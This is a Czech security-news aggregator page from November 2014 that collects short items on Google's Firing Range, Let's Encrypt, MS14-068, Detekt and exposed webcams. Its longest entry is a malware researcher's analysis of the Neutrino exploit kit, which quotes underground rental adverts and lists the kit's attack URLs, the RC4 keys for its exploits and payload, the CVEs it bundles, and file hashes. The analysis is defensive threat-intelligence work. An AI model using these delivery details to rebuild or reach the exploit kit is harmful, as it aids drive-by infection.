Hacking & Security

Firing Range - Open Source skener zranitelností webových aplikací z dílny Google

CSIRT.cz - 21 Listopad, 2014 - 11:48

Společnost Google spustila v úterý nástroj na testování bezpečnosti "Firing Range", který se zaměřuje na zvýšení efektivity automatických bezpečnostních skenerů webových aplikací tím, že je doplní o velký rozsah cross-site scripting (XSS) a další zranitelnosti webů vídaných "in the wild".

Kategorie: Hacking & Security

Let's Encrypt - certifikační autorita bude poskytovat bezplatné SSL certifikáty pro všechny weby

CSIRT.cz - 21 Listopad, 2014 - 11:36

Nezisková nadace EFF se spojila s velkými a uznávanými hráči včetně společností Mozzila, Cisco a Akamai za účelem bezplatného poskytování HTTPS/SSL certifikátů pro provozovatele webových serverů. Cílem je povzbudit provozovatele k používání šifrovaného komunikačního kanálu při komunikaci uživatelů s daným serverem. Projekt by měl být spuštěn v roce 2015.

Kategorie: Hacking & Security

Microsoft uvolnil mimořádnou záplatu pro chybu Bug MS14-068 v protokolu kerberos

CSIRT.cz - 21 Listopad, 2014 - 11:28

Společnost Microsoft uvolnila mimořádnou bezpečnostní záplatu opravující kritickou zranitelnost ve všech podporovaných verzích serverového OS Windows. Chyba je zneužívána útočníky ke kompromitaci celých počítačových sítí.

Kategorie: Hacking & Security

Detekt je bezplatný nástroj pro detekci spyware na telefonech a PC

CSIRT.cz - 21 Listopad, 2014 - 11:24

Amnesty International vydala nástroj Detekt sloužící k odhalení vládních sledovacích programů na telefonech a počítačích. Nástroj vyvinul bezpečnostní expert Claudio Guarnieri.

Kategorie: Hacking & Security

Nová kritická chyba se týká všech verzí Android OS s výjimkou verze Lollipop

CSIRT.cz - 21 Listopad, 2014 - 11:20

Bezpečnostní analytik Jann Horn objevil chybu umožňující eskalaci oprávnění, která se týká všech zařízení s Android OS s výjimkou verze Lollipop.

Kategorie: Hacking & Security

Každou hodinu se tisíce uživatelů napálí na facebookový podvod s Audi R8 zdarma

CSIRT.cz - 21 Listopad, 2014 - 11:13

Více než 200 000 uživatelů Facebooku se již stalo obětí like-farming podvodu slibujícího dvě Audi R8 zdarma. Podle společnosti Bitdefender se navíc jejich řady rozrůstají o tisíce nových obětí každou hodinu.

Kategorie: Hacking & Security

Aplikace WhatsApp přináší End-to-End šifrování pro milióny uživatelů

CSIRT.cz - 21 Listopad, 2014 - 11:04

Aplikace WhatsApp má nyní ve výchozím nastavení plně šifrovanou komunikaci. Šifrovací protokol bude šifrovat zprávy s použitím klíče, který bude dostupný pouze uživateli, a který bude pouze na uživatelském zařízení.

Kategorie: Hacking & Security

Kyberzločinci používají makra k šíření malware

CSIRT.cz - 21 Listopad, 2014 - 11:01

Trojan Rovnix začal využívat makra vložená do nevinně vyhlížejících dokumentů Microsoft Word k infikování počítačů.

Kategorie: Hacking & Security

Nová verze Drupalu opravuje Session Hijacking a DoS zranitelnost

CSIRT.cz - 21 Listopad, 2014 - 10:46

Ve středu byly vydány nové verze oblíbeného CMS Drupal - Drupal 6.34 a Drupal 7.34. Tyto verze opravují několik poměrně kritických zranitelností, které se týkají předchozích verzí

Kategorie: Hacking & Security

Uživatelé v ČR by si měli zkontrolovat nastavení svých on-line připojených webkamer

CSIRT.cz - 21 Listopad, 2014 - 10:28

Na adrese http://www.insecam.cc/ je seznam tisíců volně dostupných webových kamer. Jedná se o zařízení, u kterých jejich majitelé nezměnili výchozí heslo (obvykle například "admin" či "123456"). Podle informací ze zahraničních médií jsou tyto kamery umístěny dokonce i v ložnicích uživatelů. V současné chvíli stránka eviduje také desítky on-line kamer z České republiky. Podle dostupných informací se problém týká dokonce i některých dětských chůviček, které lze například propojit s domácí WiFi sítí. CSIRT.CZ doporučuje uživatelům těchto zařízení provést okamžitou změnu hesla.

Kategorie: Hacking & Security

Hands on with Caine Linux: Pentesting and UEFI compatible

LinuxSecurity.com - 21 Listopad, 2014 - 10:20
LinuxSecurity.com: Wow, do I have mixed feelings about Caine Linux. First and foremost, it is a Linux-based forensic analysis system which is UEFI-compatible. However, while it is reasonably easy to boot as a Live DVD or USB system, I found it to be rather difficult to install, and quite complicated to use.
Kategorie: Hacking & Security

Detekt — Free Anti-Malware Tool To Detect Govt. Surveillance Malware

The Hacker News - 21 Listopad, 2014 - 10:20
Human rights experts and Privacy International have launched a free tool allowing users to scan their computers for surveillance spyware, typically used by governments and other organizations to spy on human rights activists and journalists around the world. This free-of-charge anti-surveillance tool, called Detekt, is an open source software app released in partnership with Human rights
Kategorie: Hacking & Security

NotCompable sets new standards for mobile botnet sophistication

LinuxSecurity.com - 21 Listopad, 2014 - 10:19
LinuxSecurity.com: The NotCompatible mobile malware has reached a new level of sophistication, according to a new report from San Francisco-based mobile security company Lookout, Inc.
Kategorie: Hacking & Security

Most Targeted Attacks Exploit Privileged Accounts

LinuxSecurity.com - 21 Listopad, 2014 - 10:18
LinuxSecurity.com: We all like to write and talk about flashy zero-day vulnerabilities. However, a new threat report cautions enterprises not to flatter themselves, because the majority of criminals are not using valuable zero-days exploits to penetrate corporate networks: they're phishing privileged account credentials from executives and IT staffs, or simply guessing passwords for automated service accounts and, in turn, exploiting that access to gather valuable information.
Kategorie: Hacking & Security

Google Releases Open Source Tool for Testing Web App Security Scanners

LinuxSecurity.com - 21 Listopad, 2014 - 10:15
LinuxSecurity.com: Google today released to open source tool called Firing Range, which is designed as a test bed for Web application security scanners that provides coverage for a wide variety of cross-site scripting (XSS) and other vulnerabilities on a massive scale. - See more at: http://threatpost.com/google-releases-open-source-xss-web-app-scanner/109445#sthash.UOEx6TLH.dpuf
Kategorie: Hacking & Security

Neutrino : The come back ! (or Job314 the Alter EK)

Malware don't need Coffee - 21 Listopad, 2014 - 01:53



Disclaimer: Once again I won't go in deep analysis of the EK in that post.
It's more a connecting the dots one.
Big thanks: Timo Hirvonen,  @Malc0de , @EKWatcher@node5 for all the help on this.


In September a post from Alter appeared on underground. He was searching for traffic to test an exploit kit he was building.

-----------------------
Всем привет.
Ищем человека с большим и стабильным потоком трафа со своего лома.
Трафик нужен для отладки и тонкой настройки работы связки.
Что конкретно требуется: 
Скорость слива 1к хостов 3-5 минут.
Доступ в ТДС или любую другую панельку где я мог бы сам включать или выключать траф на тестовый поток связки в любое удобное для меня время.
ТДС должна поддерживать работу с API автозабора.


Со своей стороны:
Месяц на выделенном сервере бесплатно
Последующая аренда по льготным условиям


Приватное решение с ограниченным набором.
Будем рады серьезному человеку с репой.
Контакт PM.
-------------------------

Google Translated as :

-------------------------
Hello.
Looking for a man with a large and stable flow of cores from your scrap.
Traffic needed for debugging and fine-tuning of the bunch.
What exactly is required:
Speed plum 1k hosts 3-5 minutes.
Access TDS or any other socket where I could turn on or off myself to the test stream traf ligament at any convenient time for me.
RTD should support the work with the API avtozabora.


For its part:
Month for a dedicated server for free
Leaseback on preferential terms


Private decision with a limited set.
We will be glad serious man with a turnip.
Contact PM.
--------------------------

On the 26th of september I spotted something that was a really good candidate for an "Alter EK".

Alter EK candidate - 2014-09-26Many things were pointing to Alter EK :
- The chronology (we do not see new pattern really often)
- The payload was contacting back the EK
and other hints (traffic filtering upfront) were confirming a "Training Range".

Talking with Will Metcalf from Emerging Threats we decided to name that Exploit Kit : Job314 (cf Knock part).

Some new tricks there. The java calls were embedded in the Flash.
Same for the CVE-2013-2551 (IE) embedded inside flash.

We saw the evolution all the following weeks.

Job314 - Test Thread - 2014-10-20

A week ago Alter published a new advert :

----------------------
Приватная связка с высоким пробивом и стабильной чистотой.
Месяц аренды от $3000
Аренда только на выделенных сервера.
Домены и фронты в стоимость аренды не входят.
Информация по составу эксплоитов не предоставляется.

Возможен тест на день 100$ (50к хостов).
Гарант только с данного борда и за ваш счет.

Jabber: s@userjab.com
-----------------------Google Translated as :-----------------------Privacy punching a bunch of high purity and stable.Month lease at $ 3000Rent only on dedicated servers.Domains and fronts in the rental price are not included.Information on the composition of exploits is not available.
Possible test day $ 100 (50k hosts).Guarantee only with this Bordeaux and at your expense.
Jabber: s@userjab.com-------------------------
The big surprise was in the Screenshot :
Alter EK screenshots - Neutrino !

So after disappearing around the 17th of  March, Neutrino is back ! Rebuilt from Scratch it seems and what we called Job314 is this Neutrino "2".


Today checking a distribution path usually redirecting to Flash EK (Necurs in /sv62a76d18537/ )

Distribution Path to Necurs via "script" redirector and Flash EK
2014-11-15then few days of Angler EK with Necurs pushed in Bedep I landed on :


Neutrino Pushing Necurs
2014-11-20 (and drops callbacks)
Let's take a look at this
Neutrino Pass:
Neutrino - 4 CVE in 1 Flash


GET http://amtudatqfi.border2 .xyz:47130/establish/40006/disguise/67531/harmony/25804/duke/grunt/north/5261/cart/51566/peter/shove/solitary/labour/squat/glad/
200 OK (text/html)

Neutrino Landing - 2014-11-20
http://pastebin.com/ssgay7Zn
Straight to the flashUnescaping the B64 blob and applying the RC4 key we can find in the flash

RC4 : lrnfsvobuudc

We get :

Path fired for each exploit
note the payload Key: uzxceruvsl

the different URI for the different Exploit.

GET http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js
200 OK (text/javascript)

GET http://amtudatqfi.border2 .xyz:47130/dark/9844/watch/5350/slip/64080/explanation/41483/mend/93598/collapse/39865/model/25005/
200 OK (text/html) Flash containing at least CVE-2014-6332, CVE-2013-2551, CVE-2014-0515, CVE-2014-0569   7a5f2d7efe55020e65dcdd77bcdf853e

The four Rc4ed Exploits embedded in the single flash
Neutrino 2014-11-21
GET http://wyuye.border2 .xyz:38779/false/hood/broom/9264/lover/22172/permit/45653/madam/44441/downstairs/grand/military/measure/themself/65550/
200 OK (application/octet-stream)  RC4 (Key : uzxceruvsl ) encoded Necurs f185111b2b0c61b26f2cdae1fee81031


Note : User-Agent: Mozilla

Based on what we saw earlier we can say that it's CVE-2014-6332 who owned that VM.

GET http://wyuye.border2 .xyz:38779/sweet.pl?whistle=word&more=start&wick=pressure&gasp=warm&join=victim&proper=52499&camera=44137&overhead=19904
404 Not Found (text/html) < CVE-2014-0569 calls. 404ed maybe because of the 200 OK on previous call.

File: That flash is well thought and seems easy to reuse, I will hold on this.
Fiddler pushed to VT here.
2014-11-24 - SWF : 19a6ef1cf490aec30018d95a4f07f42a
Let's finish with one advice from Will Metcalf (Emerging Threats) :


If u are a snort/suri user using snort < 2.9.7 or suricata w/o lua to decompress and inspect flash now is the time. https://t.co/Sh8Kq1TA46
— William Metcalf (@node5) November 20, 2014



Kategorie: Hacking & Security

FTC smackdown! More fake support scammers taken out...

Sophos Naked Security - 20 Listopad, 2014 - 23:38
The FTC has taken out more fake support scammers who are said to have badgered consumers into parting with more than $120 million. In return, the consumers received technical smoke and mirrors that was worth absolutely nothing.

Most Targeted Attacks Exploit Privileged Accounts

Threatpost - 20 Listopad, 2014 - 22:51
Most targeted attacks exploit privileged account access according to a new report commissioned by the security firm CyberArk.
Kategorie: Hacking & Security

Hackeři mají přístup i ke kamerám v Česku. Sledují i dětské chůvičky

Novinky.cz - bezpečnost - 20 Listopad, 2014 - 21:21
Počítačoví piráti zveřejnili na svých internetových stránkách soukromé záběry více než 73 000 domácností, podniků a veřejných prostranství. Získali totiž přístup do kamer s internetovým připojením po celém světě, odposlouchávali dokonce i dětské videochůvičky, pomocí kterých rodiče hlídají na dálku své ratolesti. Řadu videí nyní zveřejnil pirátský ruský server, upozornil zpravodajský portál CNN. Mezi postiženými jsou i Češi.
Kategorie: Hacking & Security

Detekt Tool Puts Surveillance Spyware on Notice

Threatpost - 20 Listopad, 2014 - 20:08
Civil rights activists and hacker Claudio Guarnieri along with partners such as the EFF and Amnesty International released Detekt, open source security software targeting activists and oppressed people that scans Windows machines for dangerous spyware.
Kategorie: Hacking & Security
Syndikovat obsah